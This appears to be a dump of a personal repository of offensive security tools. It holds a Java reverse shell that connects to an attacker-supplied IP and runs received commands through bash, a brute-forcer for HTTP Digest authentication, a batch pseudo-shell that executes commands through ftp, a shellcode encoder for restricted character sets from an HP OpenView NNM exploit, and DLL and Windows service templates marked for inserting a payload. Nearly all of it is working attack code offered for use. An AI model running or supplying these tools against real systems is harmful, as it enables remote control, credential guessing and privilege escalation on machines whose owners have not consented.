├── README.md ├── ReverseShell.java ├── digest_bf.py ├── ftp_shell.bat ├── muts_encoder.py ├── windows_dll.c └── windows_service.c /README.md: -------------------------------------------------------------------------------- 1 | Random stuff 2 | -------------------------------------------------------------------------------- /ReverseShell.java: -------------------------------------------------------------------------------- 1 | //Change ATTACKER-IP-HERE and PORT-NUMBER-HERE 2 | //Run: javac ReverseShell.java && java ReverseShell 3 | 4 | import java.net.*; 5 | import java.io.*; 6 | 7 | class ReverseShell { 8 | public static void main(String[] args) { 9 | Socket socket; 10 | try 11 | { 12 | socket = new Socket("ATTACKER-IP-HERE", PORT-NUMBER-HERE); 13 | PrintWriter socketOut = new PrintWriter(socket.getOutputStream(), true); 14 | BufferedReader socketIn = new BufferedReader(new InputStreamReader(socket.getInputStream())); 15 | Runtime rt = Runtime.getRuntime(); 16 | Process proc = null; 17 | BufferedReader cmdOut = null; 18 | BufferedReader cmdErr = null; 19 | String line = null; 20 | String[] cmd = new String[3]; 21 | cmd[0] = "/bin/bash"; 22 | cmd[1] = "-c"; 23 | 24 | while (true) 25 | { 26 | cmd[2] = socketIn.readLine(); 27 | proc = rt.exec(cmd); 28 | cmdOut = new BufferedReader(new InputStreamReader(proc.getInputStream())); 29 | cmdErr = new BufferedReader(new InputStreamReader(proc.getErrorStream())); 30 | 31 | while((line = cmdOut.readLine()) != null) 32 | { 33 | socketOut.write(line + "\n"); 34 | socketOut.flush(); 35 | } 36 | line = null; 37 | while((line = cmdErr.readLine()) != null) 38 | { 39 | socketOut.write(line + "\n"); 40 | socketOut.flush(); 41 | } 42 | line = null; 43 | } 44 | } 45 | catch (IOException e) { 46 | System.out.println(e); 47 | } 48 | } 49 | } 50 | -------------------------------------------------------------------------------- /digest_bf.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import requests 3 | import re 4 | from hashlib import md5 5 | import argparse 6 | 7 | def main(): 8 | parser = argparse.ArgumentParser() 9 | parser.add_argument("target", help="url to brute force (http://www.domain.com/path/)") 10 | parser.add_argument("userlist", help="path to a file that contains usernames (/usr/share/wordlists/users.txt)") 11 | parser.add_argument("passlist", help="path to a file that contains passwords (/usr/share/wordlists/rockyou.txt)") 12 | args = parser.parse_args() 13 | 14 | url = args.target 15 | user_file = args.userlist 16 | pass_file = args.passlist 17 | nc = "00000001" 18 | cnonce = "b9bba3388da204c4" 19 | HA1 = '' 20 | HA2 = '' 21 | nonce = '' 22 | qop = None 23 | realm = None 24 | algorithm = None 25 | digest_uri = '' 26 | response = '' 27 | msg_counter = 0 28 | 29 | #ensure the url ends with '/' 30 | if url.endswith('/') is not True: 31 | url = url + '/' 32 | 33 | #get the url path 34 | digest_uri = url[url.find('/', 8):] 35 | with open(user_file) as usernames: 36 | for username in usernames: 37 | username = username.strip() 38 | with open(pass_file) as passwords: 39 | for password in passwords: 40 | password = password.strip() 41 | msg_counter = (msg_counter + 1) % 20 42 | resp = requests.get(url) 43 | 44 | if realm == None: 45 | m = re.search('(?: realm="(.*?)")', resp.headers['www-authenticate']) 46 | realm = m.group(1).strip() 47 | 48 | if algorithm == None: 49 | m = re.search('(?: algorithm=(.*?),)', resp.headers['www-authenticate']) 50 | if (m != None): 51 | algorithm = m.group(1).strip() 52 | else: 53 | algorithm = 'MD5' 54 | 55 | if qop == None: 56 | m = re.search('(?: qop="(.*?)")', resp.headers['www-authenticate']) 57 | if (m != None): 58 | qop = m.group(1).strip() 59 | else: 60 | qop = 'unspecified' 61 | 62 | m = re.search('(?: nonce="(.*?)")', resp.headers['www-authenticate']) 63 | nonce = m.group(1).strip() 64 | 65 | if algorithm == 'MD5': 66 | HA1 = md5("%s:%s:%s" %(username, realm, password)).hexdigest() 67 | else: 68 | #this part was not tested - might not conform to RFC 2617 69 | HA1 = md5("%s:%s:%s" %(username, realm, password)).hexdigest() 70 | HA1 = md5("%s:%s:%s" % (HA1, nonce, cnonce)).hexdigest() 71 | 72 | if qop == 'auth' or qop == 'unspecified': 73 | HA2 = md5("GET:%s" %(digest_uri)).hexdigest() 74 | else: 75 | #this part was not tested - might not conform to RFC 2617 76 | HA2 = md5(resp.content).hexdigest() 77 | HA2 = md5("GET:%s:%s" %(digest_uri, HA2)).hexdigest() 78 | 79 | if 'auth' in qop: 80 | response = md5("%s:%s:%s:%s:%s:%s" %(HA1, nonce, nc, cnonce, qop, HA2)).hexdigest() 81 | else: 82 | response = md5("%s:%s:%s" %(HA1, nonce, HA2)) 83 | 84 | AuthHeader = 'Digest username="%s", realm="%s", nonce="%s", uri="%s", algorithm=%s, response="%s", nc=%s, cnonce="%s"'%(username, realm, nonce, digest_uri, algorithm, response, nc, cnonce) 85 | if qop == 'unspecified': 86 | AuthHeader = AuthHeader + ', qop=auth' 87 | else: 88 | AuthHeader = AuthHeader + ', qop=%s' %(qop) 89 | 90 | headers = {'Authorization' : AuthHeader} 91 | resp = requests.get(url, headers=headers) 92 | if resp.status_code == requests.codes.ok: 93 | print '[+] Found credentials - %s:%s' %(username, password) 94 | return 95 | 96 | if msg_counter == 0: 97 | print '[-] Trying - %s:%s' %(username, password) 98 | 99 | print '[-] Brute force completed.' 100 | 101 | if __name__ == "__main__": 102 | main() 103 | -------------------------------------------------------------------------------- /ftp_shell.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | set /p pth="Enter path to a writeable directory [c:\temp]:" 3 | if "%pth%" == "" ( 4 | set pth=c:\temp 5 | ) 6 | set pth=%pth%\ 7 | set cmd_file="%pth%ftp_cmd.txt" 8 | set output_file="%pth%ftp_output.txt" 9 | 10 | :loop 11 | set /p cmd="[%cd%] " 12 | if "%cmd%" == "exit" ( 13 | if exist %cmd_file% del /f %cmd_file% 14 | if exist %output_file% del /f %output_file% 15 | set pth= 16 | goto :eof 17 | ) 18 | if %cmd:~0,2% == cd ( 19 | pushd %cmd:~2% 20 | goto loop 21 | ) 22 | if "%cmd%" == "" ( 23 | goto loop 24 | ) 25 | echo !%cmd%^> %output_file% > %cmd_file% 26 | echo bye>> %cmd_file% 27 | ftp -s:%cmd_file% > nul 28 | type %output_file% | findstr /V /R /C:"^ftp> " | findstr /V /R /C:"^bye$" 29 | goto loop 30 | -------------------------------------------------------------------------------- /muts_encoder.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # ========================================================================================== 3 | # muts_encoder v1.0 BETA 4 | # Date: 19-08-2013 5 | # Coded by Sagi Shahar (sagi-) 6 | # Greetz: g0tmi1k 7 | # ========================================================================================== 8 | # This script automates the shellcode encoding scheme used by muts for the... 9 | # ...HP OpenView NNM 7.5.1 exploit. (http://www.exploit-db.com/exploits/5342/) 10 | # 11 | # Output: 12 | # $ python muts_encoder.py 6681caff 13 | # [i] Checking for '0x? & 0x? = 0x0' using allowed combinations...Found! 14 | # [+] 0x20202020 15 | # [+] 0x41414141 16 | # 17 | # [+] Original bytes:...0x6681caff 18 | # [+] Reversed bytes:...0xffca8166 19 | # [+] Two's complement:.0x00357e9a 20 | # 21 | # [i] Checking for '0x? + 0x? + 0x? = 0x?' using allowed combinations...Found! 22 | # [+] 0x20392020 23 | # [+] 0x627e2020 24 | # [+] 0x7d7e3e5a 25 | # ========================================================================================== 26 | # How to use (according to the output above): 27 | # Copy and paste the output addresses into metasm_shell and then use metasm's output as shellcode. 28 | # 29 | # Output: 30 | # metasm > and eax, 0x20202020 31 | # "\x25\x20\x20\x20\x20" 32 | # metasm > and eax, 0x41414141 33 | # "\x25\x41\x41\x41\x41" 34 | # metasm > sub eax, 0x20392020 35 | # "\x2d\x20\x20\x39\x20" 36 | # metasm > sub eax, 0x627e2020 37 | # "\x2d\x20\x20\x7e\x62" 38 | # metasm > sub eax, 0x7d7e3e5a 39 | # "\x2d\x5a\x3e\x7e\x7d" 40 | # metasm > push eax 41 | # "\x50" 42 | # ========================================================================================== 43 | 44 | from sys import argv, stdout 45 | 46 | # Functions 47 | def reverse_bytes(hex_bytes): 48 | to_return = list() 49 | for i in range(0, len(hex_bytes), 2): 50 | to_return.insert(0, hex_bytes[i:i+2]) 51 | return ''.join(to_return) 52 | 53 | def twos_comp(bytes): 54 | to_return = 0xffffffff - int(bytes,16) + 1 55 | return "%0.8x" % to_return 56 | 57 | # This is an example charhacter-set (can replace it with your own) 58 | char_set = ( 59 | "\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x30\x31\x32\x33\x34\x35\x36\x37\x38" 60 | "\x39\x41\x42\x43\x44\x45\x46\x47\x3b\x3c\x3d\x3e\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c" 61 | "\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d" 62 | "\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e" 63 | "\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e" 64 | ) 65 | 66 | # How to use 67 | if len(argv) < 2: 68 | print "[-] Missing arguments: ./%s " % argv[0] 69 | print " Example: ./%s 41424344" % argv[0] 70 | exit() 71 | 72 | # Variables 73 | char_set = list(char_set) 74 | bytes = [""] * 3 75 | shellcode = argv[1] 76 | found = False 77 | overflow = False 78 | 79 | # Checking if bitwise 'and' between two hex values will result in 0x0 80 | stdout.write("[i] Checking for '0x? & 0x? = 0x0' using allowed combinations...") 81 | char_set.sort() 82 | for i in xrange(0, len(char_set)): 83 | byte1 = "%x" % ord(char_set[i]) 84 | for j in xrange(0, len(char_set)): 85 | byte2 = "%x" % ord(char_set[j]) 86 | if int(byte1, 16) & int(byte2, 16) == 0: 87 | print "Found!" 88 | print "[+] 0x%s" % (byte1 * 4) 89 | print "[+] 0x%s" % (byte2 * 4) 90 | found = True 91 | break 92 | if found: 93 | break 94 | if not found: 95 | print "[-] Could not find a valid combination in the current character set." 96 | 97 | print "\n[+] Original bytes:...0x%s" % shellcode 98 | 99 | # Reversing bytes 100 | try: 101 | shellcode = reverse_bytes(shellcode) 102 | print "[+] Reversed bytes:...0x%s" % shellcode 103 | except: 104 | print "[-] Something went wrong. (#1)" 105 | exit() 106 | 107 | # Calculating two's complement 108 | try: 109 | shellcode = twos_comp(shellcode) 110 | print "[+] Two's complement:.0x%s" % shellcode 111 | except: 112 | print "[-] Something went wrong (#2)" 113 | exit() 114 | 115 | # Checking if sum of three hex numbers will equal a specific predetemined hex value 116 | stdout.write("\n[i] Checking for '0x? + 0x? + 0x? = 0x?' using allowed combinations...") 117 | found = False 118 | for i in xrange(len(shellcode), 1, -2): 119 | # Get a byte out of the actual shellcode to encode 120 | shellcode_byte = shellcode[i-2] + shellcode[i-1] 121 | for j in xrange(0, len(char_set)): 122 | for k in xrange(0, len(char_set)): 123 | for m in xrange(0, len(char_set)): 124 | sum = ord(char_set[j]) + ord(char_set[k]) + ord(char_set[m]) 125 | # Check if a combination was found 126 | if sum == int(shellcode_byte, 16): 127 | if overflow: 128 | bytes[0] = "%02x" % ord(char_set[j]) + bytes[0] 129 | bytes[1] = "%02x" % ord(char_set[k]) + bytes[1] 130 | bytes[2] = "%02x" % (ord(char_set[m])-1) + bytes[2] 131 | overflow = False 132 | else: 133 | bytes[0] = "%02x" % ord(char_set[j]) + bytes[0] 134 | bytes[1] = "%02x" % ord(char_set[k]) + bytes[1] 135 | bytes[2] = "%02x" % ord(char_set[m]) + bytes[2] 136 | found = True 137 | # Check if the shellcode byte is reached through overflow 138 | elif len(hex(sum)) == 5 and int(hex(sum)[3:5], 16) == int(shellcode_byte, 16): 139 | if overflow: 140 | bytes[0] = "%02x" % ord(char_set[j]) + bytes[0] 141 | bytes[1] = "%02x" % ord(char_set[k]) + bytes[1] 142 | bytes[2] = "%02x" % (ord(char_set[m])-1) + bytes[2] 143 | else: 144 | bytes[0] = "%02x" % ord(char_set[j]) + bytes[0] 145 | bytes[1] = "%02x" % ord(char_set[k]) + bytes[1] 146 | bytes[2] = "%02x" % ord(char_set[m]) + bytes[2] 147 | overflow = True 148 | found = True 149 | if found: 150 | break; 151 | if found: 152 | break 153 | if found: 154 | break 155 | if found: 156 | found = False 157 | 158 | # Check if the end result is 8 bytes in length 159 | if len(bytes[0]) == 8 and len(bytes[1]) == 8 and len(bytes[2]) == 8: 160 | print "Found!" 161 | for i in xrange(0, len(bytes)): 162 | print "[+] 0x" + bytes[i] 163 | else: 164 | print "[-] Could not find a valid combination in the current character set." 165 | -------------------------------------------------------------------------------- /windows_dll.c: -------------------------------------------------------------------------------- 1 | // For x64 compile with: x86_64-w64-mingw32-gcc windows_dll.c -shared -o output.dll 2 | // For x86 compile with: i686-w64-mingw32-gcc windows_dll.c -shared -o output.dll 3 | 4 | #include 5 | 6 | BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved) { 7 | if (dwReason == DLL_PROCESS_ATTACH) { 8 | system("cmd.exe /k whoami > C:\\Windows\\Temp\\dll.txt"); 9 | ExitProcess(0); 10 | } 11 | return TRUE; 12 | } 13 | -------------------------------------------------------------------------------- /windows_service.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | #define SLEEP_TIME 5000 5 | 6 | SERVICE_STATUS ServiceStatus; 7 | SERVICE_STATUS_HANDLE hStatus; 8 | 9 | void ServiceMain(int argc, char** argv); 10 | void ControlHandler(DWORD request); 11 | 12 | //add the payload here 13 | int Run() 14 | { 15 | system("whoami > c:\\windows\\temp\\service.txt"); 16 | return 0; 17 | } 18 | 19 | int main() 20 | { 21 | SERVICE_TABLE_ENTRY ServiceTable[2]; 22 | ServiceTable[0].lpServiceName = "MyService"; 23 | ServiceTable[0].lpServiceProc = (LPSERVICE_MAIN_FUNCTION)ServiceMain; 24 | 25 | ServiceTable[1].lpServiceName = NULL; 26 | ServiceTable[1].lpServiceProc = NULL; 27 | 28 | StartServiceCtrlDispatcher(ServiceTable); 29 | return 0; 30 | } 31 | 32 | void ServiceMain(int argc, char** argv) 33 | { 34 | ServiceStatus.dwServiceType = SERVICE_WIN32; 35 | ServiceStatus.dwCurrentState = SERVICE_START_PENDING; 36 | ServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_SHUTDOWN; 37 | ServiceStatus.dwWin32ExitCode = 0; 38 | ServiceStatus.dwServiceSpecificExitCode = 0; 39 | ServiceStatus.dwCheckPoint = 0; 40 | ServiceStatus.dwWaitHint = 0; 41 | 42 | hStatus = RegisterServiceCtrlHandler("MyService", (LPHANDLER_FUNCTION)ControlHandler); 43 | Run(); 44 | 45 | ServiceStatus.dwCurrentState = SERVICE_RUNNING; 46 | SetServiceStatus (hStatus, &ServiceStatus); 47 | 48 | while (ServiceStatus.dwCurrentState == SERVICE_RUNNING) 49 | { 50 | Sleep(SLEEP_TIME); 51 | } 52 | return; 53 | } 54 | 55 | void ControlHandler(DWORD request) 56 | { 57 | switch(request) 58 | { 59 | case SERVICE_CONTROL_STOP: 60 | ServiceStatus.dwWin32ExitCode = 0; 61 | ServiceStatus.dwCurrentState = SERVICE_STOPPED; 62 | SetServiceStatus (hStatus, &ServiceStatus); 63 | return; 64 | 65 | case SERVICE_CONTROL_SHUTDOWN: 66 | ServiceStatus.dwWin32ExitCode = 0; 67 | ServiceStatus.dwCurrentState = SERVICE_STOPPED; 68 | SetServiceStatus (hStatus, &ServiceStatus); 69 | return; 70 | 71 | default: 72 | break; 73 | } 74 | SetServiceStatus (hStatus, &ServiceStatus); 75 | return; 76 | } 77 | 78 | --------------------------------------------------------------------------------